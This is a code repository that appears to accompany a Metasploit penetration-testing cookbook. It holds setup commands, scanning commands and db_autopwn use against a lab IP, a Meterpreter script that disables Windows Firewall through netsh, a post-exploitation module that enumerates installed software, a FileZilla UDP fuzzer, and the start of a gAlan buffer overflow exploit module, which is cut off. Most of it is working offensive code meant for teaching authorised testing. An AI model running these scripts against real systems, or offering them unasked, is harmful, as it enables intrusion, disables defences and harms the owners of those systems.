├── .gitignore ├── Chapter1 └── Commands ├── Chapter6 └── Firewall-deactivator.rb ├── Chapter7 └── post.rb ├── Chapter8 ├── filezilla-fuzzer.rb └── gAlan.rb ├── LICENSE └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | *.gem 2 | *.rbc 3 | /.config 4 | /coverage/ 5 | /InstalledFiles 6 | /pkg/ 7 | /spec/reports/ 8 | /test/tmp/ 9 | /test/version_tmp/ 10 | /tmp/ 11 | 12 | ## Specific to RubyMotion: 13 | .dat* 14 | .repl_history 15 | build/ 16 | 17 | ## Documentation cache and generated files: 18 | /.yardoc/ 19 | /_yardoc/ 20 | /doc/ 21 | /rdoc/ 22 | 23 | ## Environment normalisation: 24 | /.bundle/ 25 | /vendor/bundle 26 | /lib/bundler/man/ 27 | 28 | # for a library or gem, you might want to ignore these files since the code is 29 | # intended to run in multiple environments; otherwise, check them in: 30 | # Gemfile.lock 31 | # .ruby-version 32 | # .ruby-gemset 33 | 34 | # unless supporting rvm < 1.11.0 or doing something fancy, ignore this: 35 | .rvmrc 36 | -------------------------------------------------------------------------------- /Chapter1/Commands: -------------------------------------------------------------------------------- 1 | 2 | Guidelines for running command lines – Chapter 1 3 | 4 | Here I will explain the setup that is required to run the commands mentioned in the book. I have divided this documentation according to the recipes. 5 | Configuring Metasploit on Ubuntu 6 | To execute the command lines mentioned in this chapter we will require ubuntu operating system installed. 7 | We can start the terminal window and pass on the commands to execute them. Also we will need a downloaded copy of metasploit framework for Linux. For this recipe we are considering that we have version 4 of metasploit framework. 8 | The command lines used in this recipe are 9 | $ chmod +x framework-4.*-linux-full.run 10 | $ sudo ./framework-4.*-linux-full.run 11 | 12 | 13 | $ chmod +x framework-4.*-linux-mini.run 14 | $ sudo ./framework-4.*-linux-mini.run 15 | 16 | $ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems 17 | 18 | $ sudo apt-get install subversion 19 | 20 | $ sudo apt-get install build-essential ruby-dev libpcap-dev 21 | 22 | $ tar xf framework-4.X.tar.gz 23 | $ sudo mkdir -p /opt/metasploit4 24 | $ sudo cp -a msf4/ /opt/metasploit3/msf4 25 | $ sudo chown root:root -R /opt/metasploit4/msf4 26 | $ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/ 27 | 28 | 29 | 30 | 31 | 32 | Metasploit with BackTrack 5 – The Ultimate combination 33 | This recipe will need an installed copy of BackTrack 5 operating system. It will not require downloading metasploit framework as Backtrack OS comes pre-installed with metasploit. 34 | The command lines used in this recipe are: 35 | The metasploit command line console or msfconsole can be started by following the listed path on the Backtrack desktop : Applications > Exploitation Tools > Metasploit > Framework 36 | The commands mentioned in this recipe will require launching the terminal window in BT5 OS. The commands are : 37 | root@bt:~# cd /pentest/exploits/framework3 38 | root@bt:/pentest/exploits/framework3 ~# ./msfconsole 39 | 40 | These commands will have to be executed from the terminal window in order to start the msfconsole. 41 | 42 | Connecting Metasploit on virtual machine with SSH connectivity 43 | The commands mentioned in this recipe can also be executed directly from the terminal of BackTrack OS. The commands used are: 44 | root@bt:~# /etc/init.d/start ssh 45 | root@bt:~# start ssh 46 | 47 | root@bt:~# ifconfig 48 | 49 | 50 | Beginning with Interfaces- The “hello world” of metasploit 51 | The commands mentioned in this recipe can be executed directly from the Backtrack terminal and needs no other installation. The commands used are: 52 | root@bt:~# cd /pentest/exploits/framework3 53 | 54 | root@bt:/pentest/exploits/framework3# ./msfconsole 55 | 56 | 57 | msf > ls 58 | msf > help 59 | msf > msfupdate 60 | 61 | Setting up the database in Metasploit 62 | The following commands have to be executed directly from the Backtrack console 63 | root@bt:~# cd /opt/framework3/config 64 | 65 | root@bt:/opt/framework3/config# cat database.yml 66 | 67 | The next set of commands will be executed from the msfconsole. Msfconsole can be launched by navigating through : Applications > Exploitation Tools > Metasploit > Framework > msfconsole 68 | Once the msfconsole starts we will find that the terminal now lists as msf> . 69 | Now we can execute the other commands of this recipe. 70 | 71 | msf > db_driver 72 | Msf> db_driver mysql 73 | 74 | msf > db_connect msf3:8b826ac0@127.0.0.1:7175/msf3 75 | 76 | msf> gem install postgres 77 | msf> apt-get install libpq-dev 78 | 79 | msf> db_destroy msf3:8b826ac0@127.0.0.1:7175/msf3 80 | 81 | 82 | Using database to store Penetration testing results 83 | 84 | The commands mentioned in this recipe will be executed from the msfconsole. Msfconsole can be launched by navigating through : Applications > Exploitation Tools > Metasploit > Framework > msfconsole 85 | The commands include: 86 | msf > db_nmap 192.168.56.102 87 | 88 | msf > nmap 192.168.56.102 –A -oX report 89 | 90 | 91 | 92 | 93 | 94 | Analysing the stored results of the database 95 | 96 | The commands mentioned in this recipe will be executed from the msfconsole. Msfconsole can be launched by navigating through : Applications > Exploitation Tools > Metasploit > Framework > msfconsole 97 | The commands used are: 98 | msf > hosts address,os_name 99 | msf > hosts -c 100 | msf > services 101 | msf > vulns 102 | 103 | Msf > db_autopwn 104 | 105 | 106 | 107 | -------------------------------------------------------------------------------- /Chapter6/Firewall-deactivator.rb: -------------------------------------------------------------------------------- 1 | # Author: Abhinav Singh 2 | # Windows Firewall De-Activator 3 | 4 | #Option/parameter Parsing 5 | 6 | opts = Rex::Parser::Arguments.new( 7 | "-h" => [ false, "Help menu." ] 8 | ) 9 | 10 | opts.parse(args) { |opt, idx, val| 11 | case opt 12 | when "-h" 13 | print_line "Meterpreter Script for disabling the Default windows Firelwall" 14 | print_line "Let's hope it works" 15 | print_line(opts.usage) 16 | raise Rex::Script::Completed 17 | end 18 | } 19 | 20 | # OS validation and command execution 21 | 22 | unsupported if client.platform !~ /win32|win64/i 23 | end 24 | begin 25 | print_status("disabling the default firewall") 26 | cmd_exec('cmd /c','netsh advfirewall set AllProfiles state off',5) 27 | -------------------------------------------------------------------------------- /Chapter7/post.rb: -------------------------------------------------------------------------------- 1 | require 'msf/core' 2 | require 'rex' 3 | require 'msf/core/post/windows/registry' 4 | 5 | class Metasploit3 < Msf::Post 6 | 7 | include Msf::Post::Windows::Registry 8 | 9 | def initialize(info={}) 10 | super( update_info( info, 11 | 'Name' => 'Windows Gather Installed Application Enumeration', 12 | 'Description' => %q{ This module will enumerate all installed applications }, 13 | 'License' => MSF_LICENSE, 14 | 'Author' => [ 'Carlos Perez '], 15 | 'Version' => '$Revision$', 16 | 'Platform' => [ 'windows' ], 17 | 'SessionTypes' => [ 'meterpreter' ] 18 | )) 19 | 20 | end 21 | 22 | def app_list 23 | tbl = Rex::Ui::Text::Table.new( 24 | 'Header' => "Installed Applications", 25 | 'Indent' => 1, 26 | 'Columns' => 27 | [ 28 | "Name", 29 | "Version" 30 | ]) 31 | appkeys = [ 32 | 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 33 | 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 34 | 'HKLM\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 35 | 'HKCU\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 36 | ] 37 | apps = [] 38 | appkeys.each do |keyx86| 39 | found_keys = registry_enumkeys(keyx86) 40 | if found_keys 41 | found_keys.each do |ak| 42 | apps << keyx86 +"\\" + ak 43 | end 44 | end 45 | end 46 | 47 | t = [] 48 | while(not apps.empty?) 49 | 50 | 1.upto(16) do 51 | t << framework.threads.spawn("Module(#{self.refname})", false, apps.shift) do |k| 52 | begin 53 | dispnm = registry_getvaldata("#{k}","DisplayName") 54 | dispversion = registry_getvaldata("#{k}","DisplayVersion") 55 | tbl << [dispnm,dispversion] if dispnm and dispversion 56 | rescue 57 | end 58 | end 59 | 60 | end 61 | t.map{|x| x.join } 62 | end 63 | 64 | results = tbl.to_s 65 | 66 | print_line("\n" + results + "\n") 67 | 68 | p = store_loot("host.applications", "text/plain", session, results, "applications.txt", "Installed Applications") 69 | print_status("Results stored in: #{p}") 70 | end 71 | 72 | def run 73 | print_status("Enumerating applications installed on #{sysinfo['Computer']}") 74 | app_list 75 | end 76 | 77 | end 78 | -------------------------------------------------------------------------------- /Chapter8/filezilla-fuzzer.rb: -------------------------------------------------------------------------------- 1 | require 'msf/core' 2 | 3 | class Metasploit3 < Msf::Auxiliary 4 | 5 | include Msf::Auxiliary::Scanner 6 | def initialize 7 | super( 8 | 'Name' => 'FileZilla Fuzzer', 9 | 'Version' => '$Revision: 1 $', 10 | 'Description' => 'Filezilla FTP fuzzer', 11 | 'Author' => 'Abhinav_singh a.k.a Darkl0rd', 12 | 'License' => MSF_LICENSE 13 | ) 14 | register_options( [ 15 | Opt::RPORT(14147), 16 | OptInt.new('STEPSIZE', [ false, "Increase string size each iteration with this number of chars",10]), 17 | 18 | OptInt.new('DELAY', [ false, "Delay between connections",0.5]), 19 | OptInt.new('STARTSIZE', [ false, "Fuzzing string startsize",10]), 20 | OptInt.new('ENDSIZE', [ false, "Fuzzing string endsize",20000]) 21 | ], self.class) 22 | end 23 | 24 | 25 | def run_host(ip) 26 | 27 | udp_sock = Rex::Socket::Udp.create( 28 | 'Context' => 29 | { 30 | 'Msf' => framework, 31 | 'MsfExploit' => self, 32 | } 33 | ) 34 | startsize = datastore['STARTSIZE'] # fuzz data size to begin with 35 | count = datastore['STEPSIZE'] # Set count incriment 36 | while count < 10000 # While the count is under 10000 run 37 | evil = "A" * count # Set a number of "A"s equal to count 38 | pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00" # Define the payload 39 | udp_sock.sendto(pkt, ip, datastore['RPORT']) # Send the packet 40 | print_status("Sending: #{evil}") 41 | resp = udp_sock.get(1) # Capture the response 42 | count += 100 # Increase count by 10, and loop 43 | end 44 | end 45 | end 46 | -------------------------------------------------------------------------------- /Chapter8/gAlan.rb: -------------------------------------------------------------------------------- 1 | require 'msf/core' 2 | class Metasploit3 < Msf::Exploit::Remote 3 | include Msf::Exploit::FILEFORMAT 4 | def initialize(info = {}) 5 | super(update_info(info, 6 | 'Name' => 'gAlan 0.2.1 Buffer Overflow Exploit', 7 | 'Description' => %q{ 8 | This module exploits a stack overflow in gAlan 0.2.1 9 | By creating a specially crafted galan file, an an attacker may be able 10 | to execute arbitrary code. 11 | }, 12 | 'License' => MSF_LICENSE, 13 | 'Author' => [ 'original by Jeremy Brown' ], 14 | 'Version' => '$Revision: 7724 $', 15 | 'References' => 16 | [ 17 | [ 'URL', 'http://www.exploit-db.com/exploits/10339' ], 18 | ], 19 | 'DefaultOptions' => 20 | { 21 | 22 | 'EXITFUNC' => 'process', 23 | }, 24 | 'Payload' => 25 | { 26 | 'Space' => 1000, 27 | 'BadChars' => "\x00\x0a\x0d\x20\x0c\x0b\x09", 28 | 'StackAdjustment' => -3500, 29 | }, 30 | 'Platform' => 'win', 31 | 'Targets' => 32 | [ 33 | [ 'Windows XP Universal', { 'Ret' => 0x100175D0} ], # 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